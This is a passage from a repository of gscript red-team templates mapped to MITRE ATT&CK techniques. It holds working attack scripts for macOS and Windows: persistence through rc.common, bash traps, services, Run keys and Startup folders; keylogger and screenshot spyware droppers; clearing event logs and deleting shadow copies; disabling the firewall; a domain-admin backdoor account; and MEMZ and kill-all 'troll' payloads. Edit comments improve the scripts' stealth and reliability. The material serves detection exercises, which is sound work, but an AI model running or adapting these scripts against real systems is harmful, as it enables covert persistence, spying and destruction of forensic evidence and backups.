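  LogInfo("dropped the runner script");

  // Hook the runner into rc.common.
  var file_location = "/etc/rc.common";
  LogInfo("File Location: " + file_location);
  var rc_common_bytes = StringToByteArray("\nsh " + fn2 + "\n");
  var does = FileExists(file_location);
  if (does.FileExists) {
    LogInfo("file already exists, so appending");
    var obj = AppendFileBytes(file_location, rc_common_bytes);
    LogInfo(obj.fileError);
  } else {
    LogInfo("file does not exist, so creating it");
    WriteFile(file_location, rc_common_bytes, dataMode);
  }
  return true;
}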
42 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "Done rc.common persistence";
  LogInfo(banner);
  return true;
}
47 |
--------------------------------------------------------------------------------
/beta/attack/os_x/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.macho
12 |
13 |
// Pre-deploy hook: logs the start of the screenshot step; never blocks.
function BeforeDeploy() {
  var banner = "Starting GoRedSpy";
  LogInfo(banner);
  return true;
}
18 |
// Drops GoRedSpy under a random 5-character name in /private/tmp and forks it
// to take 48 screenshots 1800s apart into /private/tmp. Forking means the
// 24-hour run outlives this script's 150s timeout.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755

  var token = "";
  for (var idx = 0; idx < 5; idx++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var dropPath = "/private/tmp/" + token;

  var spy = Asset("GoRedSpy.macho");
  WriteFile(dropPath, spy.fileData, execMode);
  LogInfo("dropped the spy binary here: " + dropPath);

  var spyArgs = ["-outDir", "/private/tmp", "-count", "48", "-delay", "1800s"];
  ForkExecuteCommand(dropPath, spyArgs);
  return true;
}
33 |
// Post-deploy hook: logs completion; the forked screenshotter keeps running.
function AfterDeploy() {
  var banner = "Done GoRedSpy";
  LogInfo(banner);
  return true;
}
38 |
--------------------------------------------------------------------------------
/beta/attack/os_x/service_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Service Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default gscript service install
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1050
7 |
8 | //priority:100
9 | //timeout:30
10 | //import:/private/tmp/example.macho
11 |
// Service identity passed to InstallSystemService in Deploy; service_name is
// also the handle used for StartServiceByName (and the commented-out
// teardown in AfterDeploy).
var service_label = "Gscript Daemon";
var service_name = "gscriptdaemon";
var service_desc = "this is a test daemon.";
15 |
// Pre-deploy hook: logs the start of the service install; never blocks.
function BeforeDeploy() {
  var banner = "Starting install service persistence.";
  LogInfo(banner);
  return true;
}
20 |
// Drops the sample under a random name in /private/tmp, installs it as a
// system service through gscript's InstallSystemService helper and starts it.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755

  var token = "";
  for (var idx = 0; idx < 5; idx++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var path = "/private/tmp/" + token;

  var example = Asset("example.macho");
  WriteFile(path, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + path);

  // Install, then start, under the module-level service identity.
  InstallSystemService(path, service_name, service_label, service_desc);
  LogInfo("Service Installed");
  StartServiceByName(service_name);
  LogInfo("Service Started");
  return true;
}
38 |
// Post-deploy hook. Teardown (StopServiceByName / RemoveServiceByName on
// "gscriptdaemon", with a short Sleep between) is deliberately left out so
// the service stays installed for the exercise; add it back here to clean up.
function AfterDeploy() {
  return true;
}
47 |
--------------------------------------------------------------------------------
/beta/attack/os_x/tamper_histcontrol.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Tamper Histcontrol
3 | // Author: ahhh
4 | // Purpose: sets HISTCONTROL=ignorespace for bash shells,
5 | // such that a malicious user can launch new terminals and use a single space before a command to evade the history file
6 | // Gscript version: 0.1.2
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1148
8 |
9 | //priority:150
10 | //timeout:150
11 |
// Pre-deploy hook: logs the start of the HISTCONTROL tamper; never blocks.
function BeforeDeploy() {
  var banner = "Starting Tamper Histcontrol";
  LogInfo(banner);
  return true;
}
16 |
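// Appends HISTCONTROL=ignorespace to the current user's ~/.bash_profile so
// commands prefixed with a space are kept out of bash history.
//
// Fix: the original wrote "HISTCONTROL=ignorespace \r\n". Bash reads that as
// the assignment followed by a command named "\r": the variable is put in
// the environment of a command that does not exist and is never set in the
// interactive shell, so the tamper silently did nothing. The line is now a
// plain Unix line, framed with "\n" in case the file lacks a trailing newline,
// and a freshly created profile is written 0644 (it is sourced, not executed).
// NOTE(review): this affects bash only; on a zsh default shell (macOS 10.15+)
// the equivalent is `setopt HIST_IGNORE_SPACE` in ~/.zshrc.
function Deploy() {
  var whoami = GetUser();
  var file_location = "/Users/" + whoami.username + "/.bash_profile";
  LogInfo("File Location: " + file_location);
  var histcontrol_bytes = StringToByteArray("\nHISTCONTROL=ignorespace\n");
  var does = FileExists(file_location);
  if (does.FileExists) {
    LogInfo("file already exists, so appending");
    var obj = AppendFileBytes(file_location, histcontrol_bytes);
    LogInfo(obj.fileError);
  } else {
    LogInfo("file does not exist, so creating it");
    WriteFile(file_location, histcontrol_bytes, parseInt("644", 8));
  }
  return true;
}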
32 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "Done Tamper Histcontrol";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/os_x/trap_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Trap Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Trap
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1154
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
// Pre-deploy hook: logs the start of the trap persistence step; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Trap Persistence";
  LogInfo(banner);
  return true;
}
16 |
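// Drops the sample under a random name in /private/tmp and adds a `trap` for
// SIGINT (signal 2) to the current user's ~/.bash_profile, so the sample runs
// whenever the user presses Ctrl-C in a login shell.
//
// Fix: the original line was "trap <path> 2 \r\n". The trailing "\r" is not
// whitespace to bash, so it is passed as a second signal spec and rejected
// with a visible "bad trap" error at every shell start -- an obvious tell.
// The line is now "trap '<path>' 2" with Unix newlines, framed with "\n" in
// case the file lacks a trailing newline; a freshly created profile is
// written 0644 (it is sourced, not executed).
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var execMode = parseInt("755", 8); // 0755; legacy octal literals are invalid in strict mode

  // Drop the sample.
  var example = Asset("example.macho");
  var token = "";
  for (var i = 0; i < 5; i++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var name = "/private/tmp/" + token;
  WriteFile(name, example.fileData, execMode);
  LogInfo("dropped the example binary here: " + name);

  // Install the trap in the login-shell profile.
  var whoami = GetUser();
  var file_location = "/Users/" + whoami.username + "/.bash_profile";
  LogInfo("File Location: " + file_location);
  var trap_bytes = StringToByteArray("\ntrap '" + name + "' 2\n");
  var does = FileExists(file_location);
  if (does.FileExists) {
    LogInfo("file already exists, so appending");
    var obj = AppendFileBytes(file_location, trap_bytes);
    LogInfo(obj.fileError);
  } else {
    LogInfo("file does not exist, so creating it");
    WriteFile(file_location, trap_bytes, parseInt("644", 8));
  }
  LogInfo("Persisted binary using trap, for SIGINT, so the .bash_profile");
  return true;
}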
46 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done, deployed binary with Trap persistence";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/skeleton.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Skeleton
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 0.1.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Skeleton pre-deploy hook: nothing to check, so deployment always proceeds.
function BeforeDeploy() {
  var proceed = true;
  return proceed;
}
15 |
// Skeleton deploy step: does nothing and reports success.
function Deploy() {
  var ok = true;
  return ok;
}
20 |
// Skeleton post-deploy hook: does nothing and reports success.
function AfterDeploy() {
  var ok = true;
  return ok;
}
--------------------------------------------------------------------------------
/beta/attack/windows/delete_event_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Event Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security event logs on a Windows machine
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1070
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Pre-deploy hook: logs the start of the event-log wipe; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Delete Event Logs";
  LogInfo(banner);
  return true;
}
15 |
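// Clears the Security, Application, System and "Windows PowerShell" classic
// event logs and the Sysmon operational channel. Needs an elevated context.
//
// Fixes over the original:
//  - "Windows, PowerShell" was split on the comma into two log names,
//    "Windows" and "PowerShell", neither of which exists; the log is named
//    "Windows PowerShell" and is passed as one quoted name.
//  - "Sysmon" is not a classic log. Sysmon writes to the ETW channel
//    Microsoft-Windows-Sysmon/Operational, which Clear-EventLog (classic API)
//    cannot reach; wevtutil cl can.
//  - the cmdlets are passed through -Command so PowerShell's own parser
//    handles quoting instead of relying on argv re-joining.
function Deploy() {
  ExecuteCommand("powershell.exe", ["-NoProfile", "-Command", "Clear-EventLog -LogName Security,Application,System"]);
  ExecuteCommand("powershell.exe", ["-NoProfile", "-Command", "Clear-EventLog -LogName 'Windows PowerShell'"]);
  ExecuteCommand("wevtutil.exe", ["cl", "Microsoft-Windows-Sysmon/Operational"]);
  LogInfo("Cleared Event Logs");
  return true;
}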
23 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done Delete Event Logs";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/windows/delete_volume_shadow_copy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Volume Shadow Copy
3 | // Author: ahhh
4 | // Purpose: Deletes the volume shadow copy with both wmic and vssadmin
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1107
7 |
8 | //priority:100
9 | //timeout:150
10 |
// Declared but never assigned or read anywhere in this script.
var fn;
12 |
// Pre-deploy hook: logs the start of the shadow-copy deletion; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Delete Volume Shadow Copy";
  LogInfo(banner);
  return true;
}
17 |
// Removes volume shadow copies two ways: vssadmin (oldest copy of C: only,
// per /oldest) and wmic (every shadow copy instance). Both calls are forked,
// so the log lines record the launch, not the outcome; both need an
// elevated context.
function Deploy() {
  var vssArgs = ["delete", "shadows", "/for=c:", "/oldest", "/quiet"];
  ForkExecuteCommand("vssadmin.exe", vssArgs);
  LogInfo("Deleted the volume shadow copy with the vssadmin tool");

  var wmicArgs = ["shadowcopy", "delete", "/nointeractive"];
  ForkExecuteCommand("wmic.exe", wmicArgs);
  LogInfo("Deleted the volume shadow copy with wmic");
  return true;
}
29 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "done Deleting VSC";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/windows/disable_windows_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the windows firewall by turning it off.
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Pre-deploy hook: logs the start of the firewall change; never blocks.
function BeforeDeploy() {
  var banner = "Starting Disable Windows Firewall";
  LogInfo(banner);
  return true;
}
15 |
// Turns the Windows Firewall off for every profile (domain, private, public)
// with netsh. Needs an elevated context; the result is not inspected.
function Deploy() {
  var netshArgs = ["advfirewall", "set", "allprofiles", "state", "off"];
  ExecuteCommand("netsh", netshArgs);
  return true;
}
20 |
// Post-deploy hook: logs completion only.
function AfterDeploy() {
  var banner = "Done Disable Windows Firewall";
  LogInfo(banner);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/windows/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Drops the ShyGuy keylogger DLL into C:\Users\Public and starts it through rundll32 (the "screenshots every half hour" text here was copied from screenshot_spy.gs and does not describe this script)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using ShyGuy:
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/ShyGuy_x64.dll
12 |
13 |
// Pre-deploy hook: logs the start of the keylogger drop; never blocks.
function BeforeDeploy() {
  var banner = "Starting Keylog";
  LogInfo(banner);
  return true;
}
18 |
// Drops the ShyGuy keylogger DLL into C:\Users\Public under a random
// 5-character name and loads it with rundll32 using the "<path>,<export>"
// syntax (export "dllmain"). rundll32 is forked so the hook keeps running
// after Deploy returns.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

  var token = "";
  for (var idx = 0; idx < 5; idx++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var dllPath = "C:\\Users\\Public\\" + token + ".dll";

  var spy = Asset("ShyGuy_x64.dll");
  // Unix mode bits have no meaning on Windows; kept for parity with the
  // other droppers.
  WriteFile(dllPath, spy.fileData, parseInt("755", 8));
  LogInfo("dropped the spy binary here: " + dllPath);

  var entry = dllPath + ",dllmain";
  ForkExecuteCommand("C:\\Windows\\System32\\rundll32.exe", [entry]);
  return true;
}
33 |
// Post-deploy hook: logs completion; the forked keylogger keeps running.
function AfterDeploy() {
  var banner = "Done Keylog";
  LogInfo(banner);
  return true;
}
38 |
--------------------------------------------------------------------------------
/beta/attack/windows/net_user_creation.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Net User Creation
3 | // Author: ahhh
4 | // Purpose: add a local user, domain user, add them to local administrators and domain administrators groups
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1136
7 |
8 | //priority:100
9 | //timeout:150
10 |
// Declared but never assigned or read anywhere in this script.
var fn;
12 |
// Pre-deploy hook: logs the start of the account creation; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Net User Creation";
  LogInfo(banner);
  return true;
}
17 |
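// Creates a local and a domain account "spoderman" and adds it to Domain
// Admins and the local Administrators group.
//
// Fixes over the original:
//  - every net.exe call was forked, so the group additions could run before
//    the account existed; the steps are dependent, so they now run
//    synchronously with ExecuteCommand.
//  - `net group Administrators ... /add` (no /domain) was dropped: `net
//    group` only manages domain global groups, so that call fails on the
//    local Administrators group, which the `net localgroup` call already
//    handles.
//  - the duplicated "Domain Administrators" comment on the local-group step
//    is gone.
// Caveat: the password is a hard-coded, weak throwaway; the point of this
// script is the detection exercise, not the account's security. Rotate it
// per engagement and make sure AfterDeploy's cleanup act actually runs.
function Deploy() {
  var username = "spoderman";
  var password = "TheAmazing";
  var fullName = "/fullname:Spoder Man";

  // Local account.
  ExecuteCommand("net.exe", ["user", username, password, "/add", fullName]);
  LogInfo("Added a local user " + username);

  // Domain account (only succeeds on a domain-joined host with rights).
  ExecuteCommand("net.exe", ["user", username, password, "/add", fullName, "/domain"]);
  LogInfo("Added a domain user " + username);

  // Domain Admins membership.
  ExecuteCommand("net.exe", ["group", "Domain Admins", username, "/add", "/domain"]);
  LogInfo("Added " + username + " to the Domain Administrators group");

  // Local Administrators membership.
  ExecuteCommand("net.exe", ["localgroup", "Administrators", username, "/add"]);
  LogInfo("Added " + username + " to the local Administrators group");
  return true;
}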
41 |
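// Post-deploy cleanup: deletes the local and domain "spoderman" accounts
// created in Deploy. Note this runs right after Deploy, so the accounts only
// exist for the duration of the script -- the exercise is about whether the
// creation is detected, not about lasting access.
//
// Fix: the second log line claimed "Removed the local user" for the domain
// deletion; it now says domain user.
function AfterDeploy() {
  var username = "spoderman";

  ForkExecuteCommand("net.exe", ["user", username, "/delete"]);
  LogInfo("Removed the local user " + username);

  ForkExecuteCommand("net.exe", ["user", username, "/delete", "/domain"]);
  LogInfo("Removed the domain user " + username);

  LogInfo("done Net User Creation");
  return true;
}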
--------------------------------------------------------------------------------
/beta/attack/windows/runkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: CurrentVersion Run Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a CurrentVersion\Run regkey
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1112
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 |
// Declared but never assigned or read anywhere in this script.
var fn;
13 |
// Pre-deploy hook: logs the start of the Run-key step; never blocks.
function BeforeDeploy() {
  var banner = "starting execution of Run Key Persistence";
  LogInfo(banner);
  return true;
}
18 |
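// Drops the sample as a random-named .exe in the temp directory and points
// an HKCU ...\CurrentVersion\Run value ("ExampleExe") at it, so it starts at
// the next logon of this user.
//
// Fix: the status message went through console.log while the rest of the
// script uses LogInfo; it now uses LogInfo too. The commented-out immediate
// execution via a hidden powershell is intentionally not restored: the Run
// key is meant to be the only trigger, so a detection can be tied to it.
function Deploy() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

  // Drop the sample.
  var example = Asset("example.exe");
  var token = "";
  for (var i = 0; i < 5; i++) {
    token += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  var name = token + ".exe";
  var path = WriteTempFile(name, example.fileData);
  LogInfo("dropped the example binary here: " + path.fullpath);

  // Persist it under the current user's Run key (no elevation needed).
  AddRegKeyString("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "ExampleExe", path.fullpath);
  LogInfo("Adding a reg key for current user run");
  return true;
}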
39 |
/**
 * Post-deploy hook: logs completion; there is nothing to clean up.
 * @returns {boolean} true
 */
function AfterDeploy() {
  var message = "done, deployed binary with run key persistence";
  LogInfo(message);
  return true;
}
--------------------------------------------------------------------------------
/beta/attack/windows/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every half hour for the next 24 hours (48 x 1800s)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.exe
12 |
13 |
/**
 * Pre-deploy hook: only announces the start of the script.
 * @returns {boolean} true, so the runner proceeds to Deploy
 */
function BeforeDeploy() {
  var banner = "Starting GoRedSpy";
  LogInfo(banner);
  return true;
}
18 |
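/**
 * Builds a random string of `length` characters from the [A-Za-z0-9] alphabet.
 * Math.random() is not a CSPRNG; the name only needs to avoid collisions, not
 * to be unpredictable.
 * @param {number} length - number of characters to produce
 * @returns {string}
 */
function randomAlnum(length) {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var out = "";
  for (var i = 0; i < length; i++) {
    out += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  return out;
}

/**
 * Drops GoRedSpy.exe into C:\Users\Public under a random 5-character name and
 * starts it through ForkExecuteCommand with 48 captures 1800s apart (the
 * 24-hour window named in the header), with -outDir pointing at the same
 * folder.
 * The file mode is the original 0755 spelled via parseInt, because legacy
 * octal literals are a SyntaxError in strict-mode JavaScript.
 * @returns {boolean} always true; WriteFile/ForkExecuteCommand results are not checked
 */
function Deploy() {
  var spy = Asset("GoRedSpy.exe");
  var dropDir = "C:\\Users\\Public\\";
  var name = dropDir + randomAlnum(5) + ".exe";
  var mode = parseInt("755", 8); // == 0755
  WriteFile(name, spy.fileData, mode);
  LogInfo("dropped the spy binary here: " + name);

  ForkExecuteCommand(name, ["-outDir", dropDir, "-count", "48", "-delay", "1800s"]);
  return true;
}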
33 |
/**
 * Post-deploy hook: logs completion; the spy process keeps running on its own.
 * @returns {boolean} true
 */
function AfterDeploy() {
  var message = "Done GoRedSpy";
  LogInfo(message);
  return true;
}
38 |
--------------------------------------------------------------------------------
/beta/attack/windows/startup_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Startup Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a script in the Startup folder
5 | // Gscript version: 0.1.1
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1060
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 |
// Script-level path of the dropped binary. Deploy assigns it and its
// commented-out execution step references it; AfterDeploy does not read it.
var fn;
13 |
/**
 * Pre-deploy hook: only announces that the script is starting.
 * @returns {boolean} true, so the runner proceeds to Deploy
 */
function BeforeDeploy() {
  var banner = "starting execution of Startup Persistence";
  LogInfo(banner);
  return true;
}
18 |
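/**
 * Builds a random string of `length` characters from the [A-Za-z0-9] alphabet.
 * Math.random() is not a CSPRNG; the name only needs to avoid collisions, not
 * to be unpredictable.
 * @param {number} length - number of characters to produce
 * @returns {string}
 */
function randomAlnum(length) {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var out = "";
  for (var i = 0; i < length; i++) {
    out += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  return out;
}

/**
 * Drops example.exe under C:\ProgramData\Microsoft\DRM with a random
 * 3-character name (kept in the script-level `fn`), then writes start.bat into
 * the all-users Startup folder so powershell launches that path at logon.
 * The sample is not executed here.
 * Fixes: the Startup-script path was assigned to an undeclared `fn2` (an
 * implicit global; a ReferenceError in strict mode) and the file mode used a
 * legacy octal literal, which strict mode rejects.
 * @returns {boolean} always true; WriteFile results are not checked
 */
function Deploy() {
  var example = Asset("example.exe");
  var mode = parseInt("755", 8); // == 0755
  fn = "C:\\ProgramData\\Microsoft\\DRM\\" + randomAlnum(3) + ".exe";
  WriteFile(fn, example.fileData, mode);
  LogInfo("dropped the example binary here: " + fn);

  // Persist the sample: the common Startup folder is a well-known autostart
  // location that logon-time monitoring commonly watches.
  var cmd = "powershell.exe -NoLogo -WindowStyle hidden -ep bypass " + fn;
  var startupScript = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\start.bat";
  WriteFile(startupScript, StringToByteArray(cmd), mode);
  LogInfo("persisted the example binary using bat / powershell script in StartUp folder");

  // Execute the sample
  //ForkExecuteCommand("powershell", ["-NoLogo", "-WindowStyle", "hidden", "-ep", "bypass", fn]);
  //LogInfo("executed the example binary");
  return true;
}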
41 |
/**
 * Post-deploy hook: logs completion; there is nothing to clean up.
 * @returns {boolean} true
 */
function AfterDeploy() {
  var message = "done, deployed binary with startup persistence";
  LogInfo(message);
  return true;
}
46 |
--------------------------------------------------------------------------------
/beta/ops/ensure_admin.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Ensure_Admin
3 | // Author: ahhh
4 | // Purpose: Gets the current user's name; if it is Administrator or root we can continue, otherwise it shuts down the gscript binary
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:40
9 | //timeout:40
10 |
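/**
 * Gate for the rest of the script: continues only when the current account's
 * username is exactly "Administrator" or "root"; any other name stops the
 * gscript binary via KillSelf(). The match is an exact string comparison, so
 * other privileged accounts are not recognised.
 * The trailing `return true` after the if/else was unreachable and is gone;
 * the comparisons use strict equality.
 * @returns {boolean} true to continue, false after KillSelf()
 */
function BeforeDeploy() {
  LogInfo("Testing Admin Users!");
  var current = GetUser();
  LogInfo("Our user is: " + current.username);

  var isPrivilegedName = current.username === "Administrator" || current.username === "root";
  if (isPrivilegedName) {
    return true;
  }

  LogInfo("Detected a non admin / root user!");
  KillSelf();
  return false;
}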
24 |
/**
 * No-op deploy step: the admin gate lives in BeforeDeploy.
 * @returns {boolean} true
 */
function Deploy() { return true; }
28 |
/**
 * Post-deploy hook: logs that the admin check finished.
 * @returns {boolean} true
 */
function AfterDeploy() {
  var message = "Done ensuring admin users!";
  LogInfo(message);
  return true;
}
--------------------------------------------------------------------------------
/troll/windows/killall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: killall Example
3 | // Author: ahhh
4 | // Purpose: Drops killall as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:450
9 | //timeout:550
10 |
11 | //go_import:os as os2
12 |
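/**
 * Writes killall.bat into the temp directory and starts it asynchronously.
 * The write error was captured as `error4` but never reported, unlike the
 * launch error; both are now logged the same way (and neither aborts the run,
 * matching the sibling scripts). Also adds the missing `;` on the return.
 * @returns {boolean} always true
 */
function Deploy() {
  var script = os2.TempDir() + "\\killall.bat";
  var body = 'sleep 8 && TASKKILL /FI "USERNAME eq User" /F';

  var writeErr = G.file.WriteFileFromString(script, body);
  console.log("errors: " + writeErr);

  var running = G.exec.ExecuteCommandAsync(script, [""]);
  console.log("errors: " + running[1]);

  return true;
}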
--------------------------------------------------------------------------------
/troll/windows/memz.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Memz Example
3 | // Author: ahhh
4 | // Purpose: Drops Memz as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/memz.exe
11 |
12 | //go_import:os as os2
13 |
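/**
 * Drops the bundled memz.exe into the temp directory under a random 4-letter
 * lowercase name and starts it asynchronously. Every error value is logged and
 * then ignored, as in the sibling scripts.
 * Fix: the write result was assigned to an undeclared `errors` (an implicit
 * global; a ReferenceError in strict mode); it is now a local. Also adds the
 * missing `;` on the return.
 * @returns {boolean} always true
 */
function Deploy() {
  console.log("Starting to drop memz binary");

  // GetAssetAsBytes returns [bytes, error]
  var memzBin = GetAssetAsBytes("memz.exe");
  console.log("errors: " + memzBin[1]);

  var naming = G.rand.GetAlphaString(4).toLowerCase();
  var fullpath = os2.TempDir() + "\\" + naming + ".exe";
  console.log("file name: " + fullpath);

  var writeErr = G.file.WriteFileFromBytes(fullpath, memzBin[0]);
  console.log("errors: " + writeErr);

  var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
  console.log("errors: " + running[1]);

  return true;
}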
--------------------------------------------------------------------------------
/troll/windows/win_viz.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: WindowsHacks Example
3 | // Author: ahhh
4 | // Purpose: Drops WindowsHacks as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: https://github.com/LazoCoder/Windows-Hacks
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //import:/private/tmp/WindowsHacks.exe
13 | //import:/private/tmp/ImageProcessing.dll
14 | //import:/private/tmp/WindowsAPI.dll
15 |
16 | //go_import:os as os2
17 |
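/**
 * Decodes one bundled asset and writes it to `fullpath`, logging the asset
 * lookup error, the destination and the write error the same way for every
 * payload. Errors are reported only; nothing aborts.
 * @param {string} assetName - name passed to GetAssetAsBytes
 * @param {string} fullpath - destination path for the bytes
 */
function dropAsset(assetName, fullpath) {
  var asset = GetAssetAsBytes(assetName); // [bytes, error]
  console.log("errors: " + asset[1]);
  console.log("file name: " + fullpath);
  var writeErr = G.file.WriteFileFromBytes(fullpath, asset[0]);
  console.log("errors: " + writeErr);
}

/**
 * Drops WindowsHacks.exe (random 4-letter lowercase name) and its two DLL
 * dependencies into the temp directory, then starts the exe asynchronously
 * through ok.bat, which pipes "5" to it on stdin.
 * Fixes: the third asset's lookup error was logged from `winBin2` instead of
 * `winBin3`, the second asset's lookup error was never logged, and the ok.bat
 * write error (`error4`) was captured but never reported. All drops now go
 * through dropAsset so each one reports the same three lines.
 * @returns {boolean} always true
 */
function Deploy() {
  console.log("Starting to drop windowz Hacks");
  var temppath = os2.TempDir();
  var naming = G.rand.GetAlphaString(4).toLowerCase();
  var fullpath = temppath + "\\" + naming + ".exe";
  dropAsset("WindowsHacks.exe", fullpath);

  // Supporting DLLs keep their real names, presumably so the exe resolves them
  // from its own directory; verify against the WindowsHacks build.
  dropAsset("ImageProcessing.dll", temppath + "\\ImageProcessing.dll");
  dropAsset("WindowsAPI.dll", temppath + "\\WindowsAPI.dll");

  // Run main payload
  var launcher = temppath + "\\ok.bat";
  var launcherErr = G.file.WriteFileFromString(launcher, "echo 5 | " + fullpath);
  console.log("errors: " + launcherErr);
  //var enc = G.encoding.EncodeBase64("echo 5 | "+fullpath);
  //var cmd = "-WindowStyle Hidden -EncodedCommand "+enc;
  var running = G.exec.ExecuteCommandAsync(launcher, [""]);
  console.log("errors: " + running[1]);

  return true;
}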
--------------------------------------------------------------------------------